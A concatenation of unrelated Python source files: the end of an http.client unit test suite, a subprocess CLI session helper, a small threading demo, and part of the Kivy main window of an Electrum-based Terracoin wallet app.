("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 443),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b",
443)):
c = client.HTTPSConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
class RequestBodyTest(TestCase):
"""Test cases where a request includes a message body."""
def setUp(self):
self.conn = client.HTTPConnection('example.com')
self.conn.sock = self.sock = FakeSocket("")
self.conn.sock = self.sock
def get_headers_and_fp(self):
f = io.BytesIO(self.sock.data)
f.readline() # read the request line
message = client.parse_headers(f)
return message, f
def test_list_body(self):
# Note that no content-length is automatically calculated for
# an iterable. The request will fall back to send chunked
# transfer encoding.
cases = (
([b'foo', b'bar'], b'3\r\nfoo\r\n3\r\nbar\r\n0\r\n\r\n'),
((b'foo', b'bar'), b'3\r\nfoo\r\n3\r\nbar\r\n0\r\n\r\n'),
)
for body, expected in cases:
with self.subTest(body):
self.conn = client.HTTPConnection('example.com')
self.conn.sock = self.sock = FakeSocket('')
self.conn.request('PUT', '/url', body)
msg, f = self.get_headers_and_fp()
self.assertNotIn('Content-Type', msg)
self.assertNotIn('Content-Length', msg)
self.assertEqual(msg.get('Transfer-Encoding'), 'chunked')
self.assertEqual(expected, f.read())
def test_manual_content_length(self):
# Set an incorrect content-length so that we can verify that
# it will not be over-ridden by the library.
self.conn.request("PUT", "/url", "body",
{"Content-Length": "42"})
message, f = self.get_headers_and_fp()
self.assertEqual("42", message.get("content-length"))
self.assertEqual(4, len(f.read()))
def test_ascii_body(self):
self.conn.request("PUT", "/url", "body")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("4", message.get("content-length"))
self.assertEqual(b'body', f.read())
def test_latin1_body(self):
self.conn.request("PUT", "/url", "body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_bytes_body(self):
self.conn.request("PUT", "/url", b"body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_text_file_body(self):
self.addCleanup(support.unlink, support.TESTFN)
with open(support.TESTFN, "w") as f:
f.write("body")
with open(support.TESTFN) as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
# No content-length will be determined for files; the body
# will be sent using chunked transfer encoding instead.
self.assertIsNone(message.get("content-length"))
self.assertEqual("chunked", message.get("transfer-encoding"))
self.assertEqual(b'4\r\nbody\r\n0\r\n\r\n', f.read())
def test_binary_file_body(self):
self.addCleanup(support.unlink, support.TESTFN)
with open(support.TESTFN, "wb") as f:
f.write(b"body\xc1")
with open(support.TESTFN, "rb") as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("chunked", message.get("Transfer-Encoding"))
self.assertNotIn("Content-Length", message)
self.assertEqual(b'5\r\nbody\xc1\r\n0\r\n\r\n', f.read())
class HTTPResponseTest(TestCase):
def setUp(self):
body = "HTTP/1.1 200 Ok\r\nMy-Header: first-value\r\nMy-Header: \
second-value\r\n\r\nText"
sock = FakeSocket(body)
self.resp = client.HTTPResponse(sock)
self.resp.begin()
def test_getting_header(self):
header = self.resp.getheader('My-Header')
self.assertEqual(header, 'first-value, second-value')
header = self.resp.getheader('My-Header', 'some default')
self.assertEqual(header, 'first-value, second-value')
def test_getting_nonexistent_header_with_string_default(self):
header = self.resp.getheader('No-Such-Header', 'default-value')
self.assertEqual(header, 'default-value')
def test_getting_nonexistent_header_with_iterable_default(self):
header = self.resp.getheader('No-Such-Header', ['default', 'values'])
self.assertEqual(header, 'default, values')
header = self.resp.getheader('No-Such-Header', ('default', 'values'))
self.assertEqual(header, 'default, values')
def test_getting_nonexistent_header_without_default(self):
header = self.resp.getheader('No-Such-Header')
self.assertEqual(header, None)
def test_getting_header_defaultint(self):
header = self.resp.getheader('No-Such-Header',default=42)
self.assertEqual(header, 42)
class TunnelTests(TestCase):
def setUp(self):
response_text = (
'HTTP/1.0 200 OK\r\n\r\n' # Reply to CONNECT
'HTTP/1.1 200 OK\r\n' # Reply to HEAD
'Content-Length: 42\r\n\r\n'
)
self.host = 'proxy.com'
self.conn = client.HTTPConnection(self.host)
self.conn._create_connection = self._create_connection(response_text)
def tearDown(self):
self.conn.close()
def _create_connection(self, response_text):
def create_connection(address, timeout=None, source_address=None):
return FakeSocket(response_text, host=address[0], port=address[1])
return create_connection
def test_set_tunnel_host_port_headers(self):
tunnel_host = 'destination.com'
tunnel_port = 8888
tunnel_headers = {'User-Agent': 'Mozilla/5.0 (compatible, MSIE 11)'}
self.conn.set_tunnel(tunnel_host, port=tunnel_port,
headers=tunnel_headers)
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertEqual(self.conn._tunnel_host, tunnel_host)
self.assertEqual(self.conn._tunnel_port, tunnel_port)
self.assertEqual(self.conn._tunnel_headers, tunnel_headers)
def test_disallow_set_tunnel_after_connect(self):
# Once connected, we shouldn't be able to tunnel anymore
self.conn.connect()
self.assertRaises(RuntimeError, self.conn.set_tunnel,
'destination.com')
def test_connect_with_tunnel(self):
self.conn.set_tunnel('destination.com')
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
# issue22095
self.assertNotIn(b'Host: destination.com:None', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
# This test should be removed when CONNECT gets the HTTP/1.1 blessing
self.assertNotIn(b'Host: proxy.com', self.conn.sock.data)
def test_connect_put_request(self):
self.conn.set_tunnel('destination.com')
self.conn.request('PUT', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
def test_tunnel_debuglog(self):
expected_header = 'X-Dummy: 1'
response_text = 'HTTP/1.0 200 OK\r\n{}\r\n\r\n'.format(expected_header)
self.conn.set_debuglevel(1)
self.conn._create_connection = self._create_connection(response_text)
self.conn.set_tunnel('destination.com')
with support.captured_stdout() as output:
self.conn.request('PUT', '/', '')
lines = output.getvalue().splitlines()
self.assertIn('header: {}'.format(expected_header), lines)
if __name__ == '__main__':
unittest.main(verbosity=2)
|
cli_session.py
|
from __future__ import absolute_import
import sys
from threading import Thread
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty # python 3.x
ON_POSIX = 'posix' in sys.builtin_module_names
class CliSession():
def __init__(self, process):
self.process = process
self.stdout = Queue()
self.stderr = Queue()
self.thread_out = Thread(target=self.__enqueue_output, args=(process.stdout, self.stdout))
self.thread_err = Thread(target=self.__enqueue_output, args=(process.stderr, self.stderr))
for t in [self.thread_out, self.thread_err]:
t.daemon = True
t.start()
self.__outputs = []
self.__errors = []
def do(self, query):
# Reads whatever remains in stdout/stderr
self.__read_all()
self.process.stdin.write(query + ';\n')
return self
def last_output(self):
self.__read_output()
return self.__outputs[-1]
def last_error(self):
self.__read_errors()
return self.__errors[-1]
def outputs(self):
self.__read_output()
return self.__outputs
def errors(self):
self.__read_errors()
return self.__errors
def has_errors(self):
self.__read_errors()
for err in self.__errors:
if 'WARNING' not in err and err != '':
return True
return False
def close(self):
self.process.stdin.write('quit;\n')
self.process.wait()
def __read_all(self):
self.__read_output()
self.__read_errors()
def __read_output(self):
r = self.__read(self.stdout)
if r:
self.__outputs.append(r)
def __read_errors(self):
r = self.__read(self.stderr)
if r:
self.__errors.append(r)
def __read(self, queue):
output = None
while True:
try:
line = queue.get(timeout=.2)
except Empty:
return output
else:
output = line if output is None else output + line
def __enqueue_output(self, out, queue):
for line in iter(out.readline, ''):
queue.put(line)
out.close()
|
threads.py
|
import time
from threading import Thread
def carro(velocidade, piloto):
trajeto = 0
while trajeto <= 100:
trajeto += velocidade
time.sleep(0.5)
print('Piloto: {} Km: {} \n' .format(piloto, trajeto))
t_carro1 = Thread(target=carro, args=[1, 'Mauricio'])
t_carro2 = Thread(target=carro, args=[2, 'Python'])
t_carro1.start()
t_carro2.start()
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from electrum_trc.bitcoin import TYPE_ADDRESS
from electrum_trc.storage import WalletStorage
from electrum_trc.wallet import Wallet, InternalAddressCorruption
from electrum_trc.paymentrequest import InvoiceStore
from electrum_trc.util import profiler, InvalidPassword, send_exception_to_crash_reporter
from electrum_trc.plugin import run_hook
from electrum_trc.util import format_satoshis, format_satoshis_plain, format_fee_satoshis
from electrum_trc.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from electrum_trc import blockchain
from electrum_trc.network import Network, TxBroadcastError, BestEffortRequestFailed
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_trc.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_trc.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_trc.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_trc.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_trc_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_trc.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum_trc/gui/kivy/data/fonts/Roboto.ttf',
'electrum_trc/gui/kivy/data/fonts/Roboto.ttf',
'electrum_trc/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum_trc/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum_trc.util import (base_units, NoDynamicFeeEstimates, decimal_point_to_base_unit_name,
base_unit_name_to_decimal_point, NotEnoughFunds, UnknownBaseUnit,
DECIMAL_POINT_DEFAULT)
ATLAS_ICON = 'atlas://electrum_trc/gui/kivy/theming/light/%s'
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
tor_auto_on = BooleanProperty()
def toggle_tor_auto_on(self, x):
self.tor_auto_on = not self.electrum_config.get('tor_auto_on', True)
self.electrum_config.set_key('tor_auto_on', self.tor_auto_on, True)
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum_trc import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'terracoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def _get_bu(self):
decimal_point = self.electrum_config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
return decimal_point_to_base_unit_name(decimal_point)
except UnknownBaseUnit:
return decimal_point_to_base_unit_name(DECIMAL_POINT_DEFAULT)
def _set_bu(self, value):
assert value in base_units.keys()
decimal_point = base_unit_name_to_decimal_point(value)
self.electrum_config.set_key('decimal_point', decimal_point, True)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
App.__init__(self)#, **kwargs)
title = _('Terracoin Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
self.tor_auto_on = self.electrum_config.get('tor_auto_on', True)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.host
self.server_port = net_params.port
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._terracoin_net_dialog = None
self._password_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
def on_pr(self, pr):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum_trc.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('terracoin:'):
self.set_URI(data)
return
# try to decode transaction
from electrum_trc.transaction import Transaction
from electrum_trc.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum_trc.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('electrum_trc/gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum_trc.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('electrum_trc/gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(title, data, show_text, failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.terracoin.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum_trc/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
Window.bind(on_key_down=self.on_key_down)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for terracoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated',
'blockchain_updated', 'status', 'new_transaction',
'verified', 'verified-islock']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_fee_histogram, ['fee_histogram'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
if self.network.tor_auto_on and not self.network.tor_on:
self.show_tor_warning()
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def show_tor_warning(self):
from kivy.uix.button import Button
from kivy.uix.image import Image
from kivy.uix.label import Label
from kivy.uix.popup import Popup
from kivy.uix.gridlayout import GridLayout
docs_uri = self.network.tor_docs_uri
def on_docs_press(a):
import webbrowser
webbrowser.open(docs_uri)
warn_box = GridLayout(rows=4, padding=20, spacing=20)
popup = Popup(title='Warning', title_align='center',
content=warn_box, auto_dismiss=False)
img_error = 'atlas://electrum_trc/gui/kivy/theming/light/error'
warn_box.add_widget(Image(source=img_error, size_hint_y=0.1))
warn_box.add_widget(Label(text=self.network.tor_warn_msg,
text_size=(Window.size[0]-40-32, None)))
docs_btn = Button(text=self.network.tor_docs_title, size_hint_y=0.1)
warn_box.add_widget(docs_btn)
dismiss_btn = Button(text=_('Close'), size_hint_y=0.1)
warn_box.add_widget(dismiss_btn)
dismiss_btn.bind(on_press=popup.dismiss)
docs_btn.bind(on_press=on_docs_press)
popup.open()
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, storage):
if storage:
wallet = Wallet(storage)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(), ask_if_wizard=True)
if getattr(wallet.storage, 'backup_message', None):
self.show_info(wallet.storage.backup_message)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
else:
self.load_wallet(wallet)
else:
def launch_wizard():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
storage = WalletStorage(path, manual_upgrades=True)
if not storage.file_exists():
wizard.run('new')
elif storage.is_encrypted():
raise Exception("Kivy GUI does not support encrypted wallet files.")
elif storage.requires_upgrade():
wizard.upgrade_storage(storage)
else:
raise Exception("unexpected storage file situation")
if not ask_if_wizard:
launch_wizard()
else:
from .uix.dialogs.question import Question
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
if self.wallet:
self.electrum_config.save_last_wallet(self.wallet)
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def terracoin_net_dialog(self):
from .uix.dialogs.terracoin_net import TerracoinNetDialog
if self._terracoin_net_dialog is None:
self._terracoin_net_dialog = TerracoinNetDialog(self)
self._terracoin_net_dialog.update()
self._terracoin_net_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'terracoin_net':
self.terracoin_net_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
elif name == 'status':
popup = Builder.load_file('electrum_trc/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
else:
popup = Builder.load_file('electrum_trc/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_trc.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_trc.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_trc_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_trc_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
if self.testnet:
self.icon = 'electrum_trc/gui/icons/electrum-trc-testnet.png'
else:
self.icon = 'electrum_trc/gui/icons/electrum-trc.png'
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
